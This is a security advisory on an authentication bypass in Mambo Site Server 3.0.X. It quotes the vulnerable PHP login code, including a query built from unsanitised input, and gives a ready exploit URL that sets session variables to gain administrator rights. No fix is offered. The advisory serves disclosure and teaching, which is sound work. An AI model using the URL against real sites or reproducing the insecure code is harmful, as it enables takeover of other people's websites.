COMMAND

    Mambo Site Server

SYSTEMS AFFECTED

    Mambo Site Server version 3.0.X

PROBLEM

    Ismael Peinado  Palomo found  following.   Mambo Site  Server is a
    dynamic portal  engine and  content management  tool based  on PHP
    and MySQL.  Any user can gain administrator privileges.

    Under 'administrator/'  dir. we  found that  index.php checks  the
    user and password:

        if (isset($submit)){
          $query  = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
          $result = $database->openConnectionWithReturn($query);
          if (mysql_num_rows($result)!= 0){
           list($userid, $dbpass, $fullname) = mysql_fetch_array($result);
        
           .....
        
           if (strcmp($dbpass,$pass)) {
            //if the password entered does not match the database record ask user to login again
            print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
           }else {
            //if the password matches the database
            if ($remember!="on"){
             //if the user does not want the password remembered and the cookie is set, delete the cookie
             if ($passwordcookie!=""){
              setcookie("passwordcookie");
              $passwordcookie="";
             }
            }
            //set up the admin session then take the user into the admin section of the site
            session_register("myname");
            session_register("fullname");
            session_register("userid");
            print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
            print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";
        
           }
          }else {
           print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
          }

    As we can  see if the  password for administrator  matches the one
    in the database, some variables are registered in the session  and
    we  are  redirected  to  index2.php...so  lets  take  a  look   at
    index2.php....

        if (!$PHPSESSID){
         print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
         exit(0);
         }
        else {
         session_start();
         if (!$myname) session_register("myname");
         if (!$fullname) session_register("fullname");
         if (!$uid) session_register("userid");
         }

    Here we can see the only  verification of a valid user is  through
    the global var. PHPSESSID, so  if we declare that variable  on the
    url,  and  set  the  'myname','fullname'  and 'userid' we can gain
    administrative control...so we'll test:

        http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator

    BINGO!!  now  we  have  full  administrative privileges...that's a
    typical example  of PHP  hacking...it's clear  that security can't
    rely on global  variables since they  may be modifyed  through url
    parsing.

SOLUTION

    Nothing yet.